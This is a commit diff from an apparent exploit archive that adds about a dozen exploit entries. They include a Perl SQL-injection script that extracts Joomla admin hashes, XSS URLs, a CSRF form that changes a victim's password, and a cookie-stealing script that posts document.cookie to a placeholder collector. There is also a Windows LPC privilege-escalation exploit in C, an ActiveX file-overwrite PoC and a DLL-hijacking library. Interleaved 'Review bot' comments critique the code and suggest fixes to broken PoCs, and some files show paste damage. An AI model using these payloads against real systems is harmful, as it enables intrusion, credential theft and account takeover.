Updated 10_02_2014

Offensive Security 2014-10-02 04:44:52 +00:00
parent 501c894288
commit 2a66404f6b
15 changed files with 809 additions and 0 deletions

@ -31348,3 +31348,17 @@ id,file,description,date,author,platform,type,port
34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability",2014-09-29,Vulnerability-Lab,ios,webapps,0 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability",2014-09-29,Vulnerability-Lab,ios,webapps,0
34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0
34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446
34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component 'cm_id' Parameter SQL Injection Vulnerability",2010-10-06,FL0RiX,php,webapps,0
34821,platforms/windows/remote/34821.txt,"InstallShield 2009 15.0.0.53 Premier 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite Vulnerability",2009-09-15,the_Edit0r,windows,remote,0
34822,platforms/windows/local/34822.c,"Microsoft Windows Local Procedure Call (LPC) Local Privilege Escalation Vulnerability",2010-09-07,yuange,windows,local,0
34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-08,anT!-Tr0J4n,windows,remote,0
34824,platforms/php/webapps/34824.txt,"Lantern CMS '11-login.asp' Cross Site Scripting Vulnerability",2010-10-08,"High-Tech Bridge SA",php,webapps,0
34825,platforms/php/webapps/34825.html,"Curverider Elgg 1.0 Templates HTML Injection Vulnerability",2009-06-22,lorddemon,php,webapps,0
34826,platforms/php/webapps/34826.html,"OPEN IT OverLook 5 'title.php' Cross Site Scripting Vulnerability",2010-10-08,"Anatolia Security",php,webapps,0
34827,platforms/php/webapps/34827.txt,"Recipe Script 5.0 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",php,webapps,0
34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 Cross Site Scripting Vulnerabilities",2010-10-06,"High-Tech Bridge SA",php,webapps,0
34829,platforms/windows/remote/34829.c,"Adobe Dreamweaver CS4 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
34830,platforms/windows/remote/34830.c,"IsoBuster 2.7 'wnaspi32.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
34831,platforms/windows/remote/34831.c,"NetStumbler 0.4 'mfc71esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
34832,platforms/windows/remote/34832.c,"Microsoft Visio 2007 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
34833,platforms/php/webapps/34833.txt,"Joomla! and Mambo 'com_trade' Component 'PID' Parameter Cross Site Scripting Vulnerability",2010-10-11,FL0RiX,php,webapps,0
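Review bot: the id column skips 34819 between the 34818 context row and the first added row (34820); confirm that id was deliberately reserved or withdrawn rather than a row dropped from this hunk, since every id here is expected to pair with a file under platforms/ added in the same commit. Two consistency points against the files in this commit: the 34831 row names mfc71esn.dll while the 34831 file's usage steps build mfc80esn.dll, and the 34828 row's version string "18.9.2010" differs from the "18.09.2010" in that file's body; one of each pair should be corrected before merge.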

platforms/php/webapps/34820.pl Executable file
@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/43821/info
The Club Manager component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/perl -w
########################################
#[~] Author : Fl0riX
#[!] Script Name: Joomla com_clubmanager
########################################
print "\t\t \n\n";
print "\t\t Fl0rix | Bug Researchers \n\n";
print "\t\t \n\n";
print "\t\t Joomla com_clubmanager Remote SQL Injection Exploit \n\n";
use LWP::UserAgent;
print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
$florix="concat(username,0x3a,password)";
$sakkure="jos_users";
$com="com_clubmanager";
$cw="+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=".$com."&tabla=equip&task=presenta&cm_id=284".$cw."1,".$florix.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/".$sakkure."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Baba Buyuksun bea Bu is bu kadar xD #\n\n";
}
else{print "\n[-] Malesef Olmadi Aga bir dahaki sefere\n";
}
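Review bot: the script runs with -w but never enables use strict, so $florix, $sakkure, $com, $cw, $b, $host, $res and $answer are all implicit globals; add "use strict;" and declare them with "my" so the -w diagnostics are meaningful. The user-facing strings are Turkish ("Site ismi" is "Site name", "Malesef Olmadi Aga bir dahaki sefere" is roughly "Unfortunately it didn't work, next time") and the prompt's example URL reads "http://wwww.site.com" with four w's; English messages and a corrected placeholder would match the rest of the archive.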

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43865/info
Lantern CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/www/html/11-login.asp?intPassedLocationID=57%27%22%3E%3Cscript%3Ealert%2834%29%3C/script%3E
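Review bot: the PoC URL targets 11-login.asp, an ASP page, yet the file lives under platforms/php/webapps and the files.csv row records the platform as php; if the product is classic ASP the path and platform column should be asp, otherwise the file should say why php is correct. The description also omits the affected version, unlike the other advisories in this commit.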

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/43871/info
Elgg is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Exploits require the attacker be an authenticated user; this permission may be trivial to acquire.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Elgg 1.0 is vulnerable; other versions may also be affected.
<body onload="document.forms.g.submit();"> <iframe name="my_frame" ALING="BOTTOM" scrolling=no width=1 heigth=1></iframe> <form method="POST" target="my_frame" action="http://www.example.com/_userdetails/index.php" name="g" id="g"> <input type=hidden name="name" value=""> <input type=hidden name="email" value=""> <input type=hidden name="moderation" value="no"> <input type=hidden name="publiccoments" value="no"> <input type=hidden name="receivenotifications" value="no"> <input type=hidden name="password1" value="password"> <------ Eye with this <input type=hidden name="password2" value="password"> <------ Eye with this <input type=hidden name="flag[commentwall_access]" value="LOGGED_IN"> <input type=hidden name="lang" value=""> <input type=hidden name="flag[sidebarsidebar-profile]" value="yes"> <input type=hidden name="flag[sidebarsidebar-communities]" value="yes"> <input type=hidden name="flag[sidebarsidebar-blog]" value="yes"> <input type=hidden name="flag[sidebarsidebar-friends]" value="yes"> <input type=hidden name="visualeditor" value="yes"> <input type=hidden name="action" value="userdetails:update"> <input type=hidden name="id" value="id_victima"> <---------Eye with this <input type=hidden name="profile_id" value="id_victima"> <---------Eye with this </form>
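Review bot: the description calls this an HTML-injection issue, but the PoC is an auto-submitting cross-site form that posts password1/password2 together with id and profile_id for a chosen account to _userdetails/index.php, which demonstrates an unprotected profile/password update (CSRF) rather than injected markup; the text and the files.csv title should describe what the PoC actually does. The HTML has also been collapsed onto one line with the author's "Eye with this" annotations sitting inside the markup as stray text, and the iframe attributes "ALING" and "heigth" are misspellings of align and height; restore the original line breaks and move the annotations into HTML comments.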

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43872/info
OverLook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
OverLook 5.0 is vulnerable; prior versions may also be affected.
<!-- -*-*- ANATOLIA SECURITY (c) 2010 -*-*- $ Title: Proof of Concept Code for OverLook v5 Cross-site Scripting Vuln. $ ADV-ID: 2010-002 $ ADV-URL: http://www.anatoliasecurity.com/adv/as-adv-2010-002.txt $ Technical Details: http://www.anatoliasecurity.com/advisories/overlook-xss * PoC created by Eliteman ~ mail: eliteman [~AT~] anatoliasecurity [~DOT~] com ~ web: elite.anatoliasecurity.com --> <html> <head> <title> OverLook v5.0 Cross-site Scripting </title> </head> <body> <form action="http://target/overlook/title.php" method="get"> <input type="hidden" name="frame" value=""><script>alert(/1337/)</script><--"> </form> <script type="text/javascript"> document.forms[0].submit(); </script> </body> </html>
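Review bot: in the form, the injected markup is placed after the closing quote of value="", so the browser submits frame as an empty parameter and the alert fires from the PoC page itself regardless of how title.php handles the input; as posted the file does not show whether the target reflects the parameter, and a reader re-testing cannot distinguish the local alert from a real finding. The HTML should also be restored to separate lines, keeping the leading comment block that carries the advisory id and URLs intact.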

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43888/info
Recipe Script is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Recipe Script 5.0 is vulnerable; other versions may also be affected.
<script>document.location ="http://localhost/[path]/cookie.php?cookie=" + document.cookie;</script>
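Review bot: the file gives only the JavaScript payload and never says which field or request it is entered into; the files.csv title names the 'First Name' field, so the affected form, parameter and an example request belong in the file body. The payload also points at http://localhost/[path]/cookie.php, which should be labelled as a placeholder so it is not read as part of the finding.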

platforms/php/webapps/34828.txt Executable file
@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/43910/info
Backbone Technology Expression is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Backbone Technology Expression 18.09.2010 is vulnerable; other versions may also be affected.
http://www.example.com/?section_copy_id=1005176%27%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
http://www.example.com/?section_id=1002815%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
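Review bot: the version string in the body, 18.09.2010, differs from the 18.9.2010 used in the files.csv title; pick one form so the entry is searchable. The two URLs cover the section_copy_id and section_id parameters named as the "multiple" issues, which is consistent, but the file should state which pages or templates reflect them so a defender can locate the affected code rather than only the query string.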

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43915/info
The 'com_trade' component for Joomla! and Mambo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?option=com_trade&task=product_info&Itemid=florix&PID=[XSS]
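Review bot: the PoC URL sets Itemid=florix, the author's handle, where Joomla expects a numeric menu item id, so anyone re-testing sends a malformed Itemid alongside the parameter under test; use a numeric placeholder such as [Itemid]. PID=[XSS] is a placeholder and should be labelled as one, and the description lacks an affected-version statement, unlike the other advisories in this commit.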

platforms/windows/local/34822.c Executable file
@ -0,0 +1,469 @@
source: http://www.securityfocus.com/bid/43860/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
A local attacker can exploit this issue to execute arbitrary code and elevate their privileges to the NetworkService account level. Failed exploit attempts may cause a denial-of-service condition.
The issue affects Microsoft Windows XP SP3; other versions may also be affected.
#include <windows.h>
#include <stdio.h>
//#include "ntdll.h"
//#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"advapi32.lib")
typedef enum _PROCESSINFOCLASS {
ProcessDebugPort=7// 7 Y Y
} PROCESSINFOCLASS;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING ,*PUNICODE_STRING;
typedef struct _CLIENT_ID
{
HANDLE UniqueProcess;
HANDLE UniqueThread;
}CLIENT_ID,* PCLIENT_ID, **PPCLIENT_ID;
#define PORT_NAME_LEN 64
#define LRPC_CONNECT_REQUEST 0
#define LPC_CONNECTION_REQUEST 10
#define offset 0x100+0x4-0x6*4
#define MAXLEN 0x148
#define BACKNAME L"\\RPC Control\\back2"
#define RPCLPCNAME L"\\RPC Control\\epmapper"
#define BINDNAME L"back2"
typedef struct _LRPC_BIND_EXCHANGE
{
INT ConnectType ;
DWORD AssocKey ;
char szPortName[PORT_NAME_LEN] ;
RPC_SYNTAX_IDENTIFIER InterfaceId;
RPC_SYNTAX_IDENTIFIER TransferSyntax;
RPC_STATUS RpcStatus;
unsigned char fBindBack ;
unsigned char fNewSecurityContext ;
unsigned char fNewPresentationContext;
unsigned char PresentationContext;
unsigned char Pad[3];
unsigned long SecurityContextId;
} LRPC_BIND_EXCHANGE;
typedef struct _LPC_MESSAGE
{
USHORT DataSize;
USHORT MessageSize;
USHORT MessageType;
USHORT DataInfoOffset;
CLIENT_ID ClientId;
ULONG MessageId;
ULONG SectionSize;
// UCHAR & nbsp; Data[];
}LPC_MESSAGE, *PLPC_MESSAGE;
typedef struct _OBJECT_ATTRIBUTES
{
DWORD Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
DWORD Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES, **PPOBJECT_ATTRIBUTES;
typedef
DWORD
(CALLBACK * NTCREATEPORT)(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxConnectInfoLength,
IN ULONG MaxDataLength,
IN OUT PULONG Reserved OPTIONAL );
typedef
DWORD
(CALLBACK * NTREPLYWAITRECVIVEPORT)(
IN HANDLE PortHandle,
OUT PHANDLE ReceivePortHandle OPTIONAL,
IN PLPC_MESSAGE Reply OPTIONAL,
OUT PLPC_MESSAGE IncomingRequest );
typedef
DWORD
(CALLBACK * NTACCEPTCONNECTPORT) (
OUT PHANDLE PortHandle,
IN PVOID PortContext OPTIONAL,
IN PLPC_MESSAGE ConnectionRequest,
IN BOOLEAN AcceptConnection,
IN OUT int int1, // IN OUT PPORT_VIEW ServerView OPTIONAL,
OUT int int2 //OUT PREMOTE_PORT_VIEW ClientView OPTIONAL
);
typedef
DWORD
(CALLBACK * NTCONNECTPORT)(
OUT PHANDLE PortHandle,
IN PUNICODE_STRING PortName,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
IN OUT int int1,
// IN OUT PPORT_VIEW ClientView OPTIONAL,
IN OUT int int2,
// IN OUT PREMOTE_PORT_VIEW ServerView OPTIONAL,
OUT PULONG MaxMessageLength OPTIONAL,
IN OUT PVOID ConnectionInformation OPTIONAL,
IN OUT PULONG ConnectionInformationLength OPTIONAL
);
typedef
DWORD
(CALLBACK *NTREQUESTWAITREPLYPORT)( // NtRequestWaitReplyPort(
IN HANDLE PortHandle,
IN PLPC_MESSAGE Request,
OUT PLPC_MESSAGE IncomingReply );
typedef
DWORD
(CALLBACK *NTCOMPLETECONNECTPORT) (
IN HANDLE PortHandle
);
typedef
DWORD
(CALLBACK *RTLINITUNICODESTRING)(
PUNICODE_STRING DestinationString,
PCWSTR SourceString
);
typedef
DWORD
(CALLBACK * NTREPLYPORT)(
IN HANDLE PortHandle,
IN PLPC_MESSAGE Reply );
typedef
DWORD
(CALLBACK * NTSETINFORMATIONPROCESS)(
IN HANDLE ProcessHandle,
IN PROCESSINFOCLASS ProcessInformationClass,
IN PVOID ProcessInformation,
IN ULONG ProcessInformationLength );
typedef struct _DEBUG_MESSAGE
{
LPC_MESSAGE PORT_MSG;
DEBUG_EVENT DebugEvent;
}DEBUG_MESSAGE, *PDEBUG_MESSAGE;
NTSETINFORMATIONPROCESS NtSetInformationProcess;
NTREPLYWAITRECVIVEPORT NtReplyWaitReceivePort;
NTCREATEPORT NtCreatePort;
NTREPLYPORT NtReplyPort;
NTCONNECTPORT NtConnectPort;
RTLINITUNICODESTRING RtlInitUnicodeString;
NTREQUESTWAITREPLYPORT NtRequestWaitReplyPort;
NTACCEPTCONNECTPORT NtAcceptConnectPort;
NTCOMPLETECONNECTPORT NtCompleteConnectPort;
template <int i> struct PORT_MESSAGEX : LPC_MESSAGE {
UCHAR Data[i];
};
PROCESS_INFORMATION pi;
int server();
void initapi();
int main()
{
// LPC_MESSAGE Reply;
// HMODULE hNtdll;
// DWORD dwAddrList[9];
BOOL bExit = FALSE;
// DWORD dwRet;
// HANDLE hPort;
int k=0;
unsigned long i;
// DEBUG_MESSAGE dm;
OBJECT_ATTRIBUTES oa = {sizeof(oa)};
PORT_MESSAGEX<0x130> PortReply,PortRecv;
STARTUPINFO si={sizeof(si)};
// NTSTATUS
int Status;
PLPC_MESSAGE Request;
// PLPC_MESSAGE IncomingReply;
LPC_MESSAGE Message;
HANDLE LsaCommandPortHandle;
UNICODE_STRING LsaCommandPortName;
SECURITY_QUALITY_OF_SERVICE DynamicQos;
LRPC_BIND_EXCHANGE BindExchange;
DWORD Key=0x11223344;
unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
BindExchange.AssocKey = Key;
// wcscpy((wchar_t *)&(BindExchange.szPortName),BINDNAME);
DynamicQos.ImpersonationLevel =SecurityAnonymous; // SecurityImpersonation;
DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; //SECURITY_DYNAMIC_TRACKING;
DynamicQos.EffectiveOnly = TRUE;
initapi();
printf( "\r\nwindows lpc test!\r\n");
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)server,0,0,&i);
//
// Connect to the Reference Monitor Command Port. This port
// is used to send commands from the LSA to the Reference Monitor.
//
RtlInitUnicodeString( &LsaCommandPortName,RPCLPCNAME);
Status = NtConnectPort(
&LsaCommandPortHandle,
&LsaCommandPortName,
&DynamicQos,
NULL,
NULL,
NULL, // &maxlen,
&BindExchange,
&Bi ndExchangeLength);
if ((Status)) {
exit(Status);
//print(("LsapRmInitializeServer - Connect to Rm Command Port failed 0x%lx\n",Status));
// goto InitServerError;
}
// exit(0);
/*
//create port
dwRet = NtCreatePort(&hPort, &oa, 0, 0x148, 0);
if(dwRet != 0)
{
printf("create hPort failed. ret=%.8X\n", dwRet);
return 0;
}
//create process
if(!CreateProcess(0, "debugme.exe", NULL, NULL, TRUE,
CREATE_SUSPENDED, 0, 0, &si, &pi))
{
printf("CreateProcess failed:%d\n", GetLastError());
return 0;
}
//set debug port
dwRet = NtSetInformationProcess(pi.hProcess, ProcessDebugPort,
&hPort, sizeof(hPo rt));
if(dwRet != 0)
{
printf("set debug port error:%.8X\n", dwRet);
return 0;
}
//printf("pid:0x%.8X %d hPort=0x%.8X\n", pi.dwProcessId, pi.dwProcessId, hPort);
ResumeThread(pi.hThread);
*/
while (true)
{
memset(&Message, 0, sizeof(Message));
Message.MessageSize=0x118;
Message.DataSize=0x100;
Message.MessageId=0x1122;
Request=&Message;
memset(&PortReply, 0, sizeof(PortReply));
// memcpy(&PortReply, &dm, sizeof(dm));
memset(&PortReply, 0, sizeof(PortReply));
// memcpy(&PortReply, &dm, sizeof(dm));
PortReply.MessageSize = 0x100;
PortReply.DataSize = 0x100-0x18;
PortReply.MessageType=0;
PortReply.MessageId=0x1122;
PortReply.Data[0]=0x0b;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0;
wcscpy((wchar_t *)&(PortReply.Data[0x10]),BINDNAME);
Sleep(1000);
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply);
// memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList));
PortReply.MessageSize = 0xa0;
PortReply.DataSize = 0xa0-0x18;
PortReply.MessageType=0;
PortReply.MessageId=0x1122;
PortReply.Data[0]=0x0;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0;
memcpy((unsigned char *)&(PortReply.Data[0x0c]),
"\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00",0x20);
//"\xe6\x73\x0c\xe6\xf9\x88\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00",0x20);
// memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList));
_asm{
// die: jmp die
}
Sleep(1000);
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply);
BindExchange=*(LRPC_BIND_EXCHANGE *)&(PortRecv.Data[8]);
if (!(Status))
{
while(1){
PortReply.MessageSize = 0x100;
PortReply.DataSize = 0x100-0x18;
PortReply.MessageType=0;
PortReply.MessageId=PortRecv.MessageId;
PortReply.Data[0]=0x01;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0x3;
PortReply.Data[5]=0;
PortReply.Data[6]=0;
*(int *)(&(PortReply.Data[0x18]))=*(int *)(&(PortRecv.Data[0x30]));
_asm{
// die: jmp die
}
Sleep(100);
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply);
Sleep(0x7fffffff);
}
}
}
return 0;
}
int server()
{
BOOL bExit = FALSE;
DWORD dwRet;
// HANDLE hPort;
int k=0;
unsigned long maxlen;
// DEBUG_MESSAGE dm;
OBJECT_ATTRIBUTES oa = {sizeof(oa)};
PORT_MESSAGEX<0x130> PortReply,PortRecv;
STARTUPINFO si={sizeof(si)};
// NTSTATUS
int Status;
PLPC_MESSAGE Request;
PLPC_MESSAGE IncomingReply;
LPC_MESSAGE Message;
HANDLE BackPortHandle,NewHandle,NewAccHandle;
UNICODE_STRING BackPortName;
SECURITY_QUALITY_OF_SERVICE DynamicQos;
LRPC_BIND_EXCHANGE BindExchange;
DWORD Key=0x11223344;
unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
BindExchange.AssocKey = Key;
DynamicQos.ImpersonationLevel =SecurityAnonymous; // SecurityImpersonation;
DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; //SECURITY_DYNAMIC_TRACKING;
DynamicQos.EffectiveOnly = TRUE;
RtlInitUnicodeString( &BackPortName,BACKNAME);
memset(&oa,0,sizeof(oa));
oa.Length=0x18;
oa.ObjectName=&BackPortName;
oa.Attributes=0x40;
//InitializeObjectAttributes(&oa,&BackPortName,0x40,0,0);
//OBJ_CASE_INSENSITIVE,0,0); //SecurityDescriptor);
//create port
dwRet = NtCreatePort(&BackPortHandle, &oa, sizeof(LRPC_BIND_EXCHANGE),MAXLEN, 0);
if(dwRet != 0)
{
printf("create hPort failed. ret=%.8X\n", dwRet);
// return 0;
}
while (true)
{
memset(&Message, 0, sizeof(Message));
Message.MessageSize=0x118;
Message.DataSize=0x100;
Message.MessageId=0x11;
Request=&Message;
memset(&PortReply, 0, sizeof(PortReply));
// memcpy(&PortReply, &dm, sizeof(dm));
PortReply.MessageSize = 0x148;
PortReply.DataSize = 0x130;
PortReply.MessageType=0;
PortReply.Data[0]=0x0b;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0;
// memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList));
Status=NtReplyWaitReceivePort(BackPortHandle,0,0,&PortRecv); //Reply);
if(PortRecv.MessageType==LPC_CONNECTION_REQUEST)
{
Status=NtAcceptConnectPort(&NewAccHandle, 0, &PortRecv,1, NULL, NULL);
Status=NtCompleteConnectPort (NewAccHandle);
memset(&PortRecv, 0, sizeof(PortRecv));
Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv); //&PortReply,&PortRecv);
while(1)
{
PortRecv.MessageSize = 0x148;
PortRecv.DataSize = 0x130;
// PortReply.MessageId=PortRecv.MessageId;
_asm{
//die: jmp die
}
Status=NtReplyWaitReceivePort(NewAccHandle,0,&PortRecv,&PortRecv); //&PortReply,&PortRecv);
Sleep(100);
Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv); //&PortReply,&PortRecv);
}
}
}
}
void initapi()
{
HMODULE hNtdll;
//get native api address
hNtdll = LoadLibrary("ntdll.dll");
if(hNtdll == NULL)
{
printf("LoadLibrary failed:%d\n", GetLastError());
}
NtReplyWaitReceivePort = (NTREPLYWAITRECVIVEPORT)
GetProcAddress(hNtdll, "NtReplyWaitReceivePort");
NtCreatePort = (NTCREATEPORT)
GetProcAddress(hNtdll, "NtCreatePort");
NtReplyPort = (NTREPLYPORT)
GetProcAddress(hNtdll, "NtReplyPort");
NtSetInformationProcess = (NTSETINFORMATIONPROCESS)
GetProcAddress(hNtdll, "NtSetInformationProcess");
NtRequestWaitReplyPort= (NTREQUESTWAITREPLYPORT)
GetProcAddress(hNtdll,"NtRequestWaitReplyPort");
NtConnectPort = (NTCONNECTPORT)
GetProcAddress(hNtdll, "NtConnectPort");
NtCompleteConnectPort = (NTCOMPLETECONNECTPORT)
GetProcAddress(hNtdll, "NtCompleteConnectPort");
NtAcceptConnectPort = (NTACCEPTCONNECTPORT)
GetProcAddress(hNtdll, "NtAcceptConnectPort");
RtlInitUnicodeString=(RTLINITUNICODESTRING)
GetProcAddress(hNtdll,"RtlInitUnicodeString");
}
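Review bot: the line "&Bi ndExchangeLength);" in the NtConnectPort call splits the identifier BindExchangeLength with a space, so the file does not compile as posted; the same artefact appears in the commented-out block as "sizeof(hPo rt)", and the LPC_MESSAGE comment carries an HTML "& nbsp;" remnant, all of which look like paste damage and should be repaired against the original submission. Beyond that, the file has a .c extension but uses C++ constructs (template <int i> struct PORT_MESSAGEX, true) and MSVC-only _asm and #pragma comment, so the build requirement (MSVC, compiled as C++) belongs in the header; DynamicQos.Length is never set before the SECURITY_QUALITY_OF_SERVICE is passed to NtConnectPort; the comment "Connect to the Reference Monitor Command Port ... send commands from the LSA to the Reference Monitor" is copied from unrelated code and does not describe the connection to \RPC Control\epmapper made here; and int server() ends after an infinite loop with no return statement.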

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43857/info
InstallShield 2009 Premier ActiveX control is prone to an arbitrary-file-overwrite vulnerability.
Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application (typically Internet Explorer) using the ActiveX control.
InstallShield 2009 Premier 15.0.0.53 is vulnerable; other versions may also be affected.
# Part Expl0it & Bug Codes ( Poc ) : ------------------------------------ <b> Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/> by : the_Edit0r <b/> <b/> <object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object> <script> try{ var obj = document.InsertCustomAction('Edit0r'); obj.AddPage(1); obj.SaveToFile("C:/system_.ini"); window.alert('check C:'); } catch(err){ window.alert('Poc failed'); } </script>
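Review bot: in the script block, document.InsertCustomAction('Edit0r') calls a method that does not exist on document, so the first statement in the try block throws and the catch branch reports "Poc failed" before any control method is reached; it looks as if the lookup of the object element by its id and the control's own method were merged into one call, and the two should be separated. The HTML has also been flattened onto one line, the header mixes <b> with malformed <b/> closers, and "Installshiled" is misspelled.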

@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/43863/info
Dupehunter Professional is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Dupehunter Professional 9.0.0.3911 is vulnerable; other versions may also be affected.
/*
#Dupehunter Professional DLL Hijacking Exploit (fwpuclnt.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Software Link:http://www.dupehunter.com
#Tested on: Windows XP sp3
# Home : www.Dev-PoinT.com
#####################
How TO use : Compile and rename to " fwpuclnt.dll " , create a file in the same dir with one of the following extensions.
check the result > Hack3d
#####################
#fwpuclnt.dll (code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "anT!-Tr0J4n",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
